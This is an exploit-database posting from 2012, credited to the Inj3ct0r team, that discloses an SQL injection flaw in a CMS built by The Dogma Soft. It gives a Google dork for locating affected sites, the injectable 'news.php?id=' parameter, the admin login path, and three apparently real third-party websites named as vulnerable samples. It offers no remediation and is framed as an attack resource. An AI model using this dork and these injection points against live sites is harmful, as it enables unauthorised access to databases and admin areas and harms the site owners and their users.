1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> The Dogma Soft - SQL Injection Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< nuxbie@linuxhacktivist.com >>> CP: +62856-2538-963 [ www.linuxhacktivist.com ] $ YM: nux_exploit - Info WebApps: This CMS Develop By The Dogma Soft: http://dogmaindia.com/ - Google Dork: intext:"Developed And Hosted By:- The Dogma Soft" - Exploit Concept: http://lokalisasi/WebApps/news.php?id=[SQL Injection] - Private Area: http://lokalisasi/WebApps/admin/ <--- LogIn Area...!!! - Sampel WebApps Vuln SQL Injection: http://urmidwar.org/news.php?id=37' + [SQL Injection] http://tensionoutservices.com/news.php?nid=22' + [SQL Injection] http://saiacademyamritsar.com/news.php?id=25' + [SQL Injection] -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ######################################################################### - Me @ Solo Raya, 21 April 2012 @ 11:07 PM. [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de ] #########################################################################